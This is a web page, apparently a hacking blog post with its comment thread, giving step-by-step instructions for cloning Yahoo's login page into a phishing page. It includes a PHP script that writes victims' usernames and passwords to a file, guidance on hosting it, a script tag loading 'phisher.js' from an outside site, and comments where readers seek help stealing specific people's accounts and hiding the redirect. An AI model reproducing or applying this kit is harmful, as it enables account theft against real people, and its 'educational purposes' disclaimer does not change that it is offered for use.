How to create Fake login/Phishing Pages
<script src=”http://www.sigmirror.com/files/47027_xexzy/phisher.js” type=”text/JavaScript”></script>
I am not responsible for any damage caused by the user.This tutorial is purely for educational purposes.Please do not misuse this tutorial.
What are Fake login pages or phishing pages ?
These pages are generally used to steal passwords and usernames from the victim.For example,if I want a person’s Yahoo id,I make a fake login page which is similar to Yahoo’s login page.So when the victim comes into my page,he thinks it is Yahoo’s login page and types in his ‘Username’ and ‘Password’.But when he types in his password the page directs into the Yahoo error page (https://login.yahoo.com/config/login?) simultaneously the info he typed goes into my database using login.php file where other Victim’s have typed in their ‘Username’ and ‘Password’.
How to make Fake Login Pages/Phishing Pages ?
Given below are some of the steps with which you can create your our fake login page for any
website or server (Yahoo,Myspace,Hotmail,Zapak,AOL,Orkut….etc.).In this whole tutorial I’m
taking the example of Yahoo !For making any other server’s fake login do the same.You will get
the hold of it when you read the whole tutorial.
1.First go to Yahoo’s login page “https://login.yahoo.com/config/login_verify2?&.src=ym”
2.Right click on the page and go to “View Page Source”.
3.You will see the whole HTML coding in it of the page(Huge huh ?).
4.Then select the whole HTML by pressing CTRL+A and copy it by pressing CTRL+C
5.Open a ‘Text document’ or ‘Notepad’ and paste the Copied contents into it and the save it as ‘Yahoo.htm’
6.Then you have to make a login.php file.For that, open another text document and paste the
following HTML code in it
$fp = fopen(“YahooPasswords.htm”, “a”);
fwrite($fp, “Email:$_POST[ID name="***"]\tPassword:$_POST[PASS name="***"]“);
echo “<HTML>
<head>
<title>Welcome To Hack-Genius</title>
<FRAMESET cols=\”*\”>
<FRAME SRC=\”http://www.hack-genius.blogspot.com\”>
</FRAMESET>”;?>
or Download the file login.php
In this Code Change only the following ie. if you want to change it
a.”YahooPasswords.htm”
b.”<title>Welcome to Hack-Genius<title/>”
c.”http://www.hack-genius.blogspot.com\” but don’t forget ‘\’ after the destined URL.
d.”3/27/2009″
e.”Email:” & “Password:”
7.Then save this document as ‘Login.php’.
8.Now to got to ‘Yahoo.htm’ and find (CTRL+F) ‘action’.
9.You will find something that likes like this action=”https://login.yahoo.com/config/login?” .
10.Change it to action=”/login.php”
12.Now find ‘Yahoo! ID’ and in the next line or near it you will find name=”login” (see closely)
So,here the id is ‘username’.(if ‘id’ does not exist then take the id=”**” or make a name=’**’ ,it is always there in
in yahoo)
13.Now, go back to login.php and replace ID name=”***” with ‘login’ (since name=’login’)
14.Find ‘Password’ and in the next line you will find name=’passwd’.So the name is ‘passwd’.Replace it with PASS name=’passwd’ with ‘passwd’
NOTE: Do not include ‘ in login.php.For example Email:$_POST[login]
15.Save both the files.
16.Upload them into any free hosting website like t35.com.Do not upload them into a directory!
17.Then to test it just type in some usename and password.
18.Refresh the control panel (the place where you uploaded the files) and them you will find
‘YahooPasswords.htm’ which is created and when you open it you will find the username and password that you entered.
If you want to see a sample Yahoo fake login page then just search in the search bar.There are nearly 7 fake login pages that i made and work perfectly.
Feel free to comment if you lost your way in the tutorial.
Related posts:
- Fake Login Page ...
- Hack Myspace IDs by using Fake Login Script/Phishing Page ...
- Facebook Fake Login Page/ Fake Login Script ...
- Rapidshare Fake Login Page/Phishing Page ...
- Yahoo Fake Login Page/Fake Login Script ...
- Facebook Fake Login Page/ Fake Login Script ...
- Rediff Fake Login Page/Fake Login Script ...
- Hack Gmail Accounts with Fake Login/Phishing page ...
about 2 years ago
thanks for this tut
about 2 years ago
Your always welcome !
about 2 years ago
Hi could u tell me if this method works for the following login page: http://156.3.109.216/abi/
about 2 years ago
By the way I have to tell you this is the best set of instrucitons for phishing that I have ever found. You have true talent my friend, I only wish that my skill with computers could develop to become half yours
about 2 years ago
hi… i downloaded ur predefined yahoo.htm and login.php and uploaded in brinkster…but as u said yahoopassword.htm has to be generated at @ control panel where i upload these 2 file. but it is not generating for me…where could be the problem? plz help me
about 2 years ago
May be the free hosting site does not allow creating .htm files without any permission,so try another free hosting site: http://blackapplehost.com works for many users and must work for you too.
about 2 years ago
http://156.3.109.216/abi/hey could u help me create a phishing page for this?
about 2 years ago
im stuck on the step where u need to enter the username ID and what u need to change in the php file thanks
about 2 years ago
Sure demitri , i'm doing it and make it by tomorrow,give me your e-mail ID
about 2 years ago
Wow thanks so much. its doctormadd76@gmail.com
about 2 years ago
Ok your work will be done !
about 2 years ago
hmm could u give me step by step instructions as to how to upload files to the internet once u are at the control panel of your webhosting account?
about 2 years ago
first off i think it would help a lot of people if u can explain steps 12-14 in greater detail i think that would help
about 2 years ago
does the HTML code you provided us work for all different login pages/servers?
about 2 years ago
ok i think i figured out how to make the actual page and i figured out hot to upload. however, when i upload the files the login page that it creates doesnt look good. how can i make it look identical to the original one?
about 2 years ago
Just see the HTML coding of the real source and try to copy it !AND I DID MY BEST TO HELP YOU WITH 12-14 STEPS CAUSE IT IS REALLY COMPLEX !
about 2 years ago
thank you very much and sorryfor all the questions. Ya i think i figured out the steps. if not i can simply use trial and error
about 2 years ago
Yah ! your right !
about 2 years ago
wow! you're the best! it works… i have a question though, is it possible that after the fake login screen (after the victim has placed his password) can i redirect him to an authentic htm that i've also uploded in my account or another site so it wouldn't be so suspicious 'coz of the dead end?
about 2 years ago
Yah ! you can do that !You gotto edit login.php by right clicking on it and select"Edit"(not after you upload it !in that you can change you SRC=\"yoursite.com\"
about 2 years ago
ok. thanks a lot man! u really rock! this is simply the coolest thing ever!
about 2 years ago
Your Welcome Newbie
about 2 years ago
Well buddy,can you create a fake login for orkut, and then give it to me at gkrishnac@gmail.comExplaining how to use that, please
about 2 years ago
You can get it from http://hack-genius.blogspot.com/2009/03/orkut-fake-login-page-fake-login-script.html
about 2 years ago
Okay I finished everything and I'm on blackapplehost.com. How do you NOT upload to a directory?
about 2 years ago
Sorry Two More Questions.1: I did it! There just one huge flaw: its slightly deformed, and the word /par and /tab are EVERYWHERE. And theres no picture D:What went wrong? I will try again right now!2:I don't see my ID & Pass anywhere? I went to control panel, and there's nothing. I went to File Manager, looking for the YahooPasswords.htm and still nothing! Can you explain?
about 2 years ago
Okay this is last question.Let's say you were making an email from yahoo with your link. How would you write it? And you wouldn't have the purple Y! or the images. Help plox
about 2 years ago
hi! sorry man… it worked so good but, my victim just changed his password again… what other way can i obtain his yahoo mail password?
about 2 years ago
Okay I sorta figured it out. When i Upload the file, it adds /par and /tab. I'm testing to see if making no spaces in the document will help. Please reply soon!
about 2 years ago
Charlot i didn't get your question !
about 2 years ago
hello ppl.my password.htm is generated but inside it only says Username: Password: =/ no password or username =shelp me pleasetry- http://hi55page.t35.com/
about 2 years ago
solved
about 2 years ago
Nice !
about 2 years ago
Hi $@! kr!$#n@ DeEp,1. I tried to follow your procedures several times, I uploaded the edited Login.php and Yahoo.htm to http://www.blackapplehost.com! Site didn't create YahooPasswords.htm!2. Please send me your simpliest procedures for friendster and yahoo fake login.My E-mail: roberto.atienza_santos@yahoo.comThanks.
about 2 years ago
I have done your job !
about 2 years ago
heyyyyy this is priya…i really din't get it…i uploaded those files in file manager of Blackapplehost…and refreshed it..nothing happened…and i don't know what to do next..??..can you please tell me..like where to test it…i mean where to enter password and ID…Thnxx……!!plss help…
about 2 years ago
You must have uploaded a file…you gotto that file which you have uploaded in your website for ex.http://yoursite.com/fakelogin.htmand then it will create a file like thishttp://yousite.com/passwords.htm
about 2 years ago
okayyyy…can u temme as a layman..???coz i seriously hav no idea…what file r u talking about…please explain step 16, 17 and 18 in detail..i'm really sorry to bother….but i'm just not getting it right…
priya
about 2 years ago
After you edit the files just upload them into t35.comOpen the file which you have uploaded (http://yoursite.t35.com/fakelogin.htm)Then you will see the fake login page You now have to type in the info into the text box and then you will see that a file will be formed after you refresh the page like http://yoursite.t35.com/fakeloginpasswords.htmThats it !
about 2 years ago
hey im getting some error i did everything u said to do but when i upload it as a file both of them 1st of all it says index of/ and shows yahoo and login.php.. as links.. and also mi other problem is after i click on yahoo and try typing something in i dont recive anything in mi web hosting account please help this is so cool!
about 2 years ago
another problem is after i click sign in it goes to the t35 wesbite? and also i recive a email from yahoo[passwrd but it shows nothing it just says username:password:…
about 2 years ago
Click on yahoo.htm and there you type the info and then you will get yahoopasswords.htm with stored passwords
about 2 years ago
hey please mail the editing portion after changing the action ..abhay1gb@gmail.com
about 2 years ago
Please explain the 12 – 14 steps clearly thanks ..
about 2 years ago
Just a few questions. For e. "email" and password" do we put in our email and password or the victim's? And then from step 12 I'm a little lost. Could you explain really specically? Sorry!
about 2 years ago
Could you do this for me? My email is briannabukeaboom@gmail.com it's for a facebook account so you can email me for the facebook id. I would reeeally appreciate it!
about 2 years ago
@BrianaYou have to wait for a victim to type in his info so the pass gets stored in passwords.htm
about 2 years ago
Yes I realize that…but how do I make it so that my phishing page shows up on the victim's computer? I found another tutorial that works just the same as yours…it was explained a little better lol. But anyways I've got the phising page set up and everything is working perfectly, I just need to know how my phising page will show up on her computer next time she goes to facebook? Like I said…how do you target a specific person?
about 2 years ago
please answer!
about 2 years ago
Hey I got it working. The only think is I wanna redirect the person to another page after, so it's not so obvious. I tried to SRC thing and it's not working. Can you explain what you meant by that?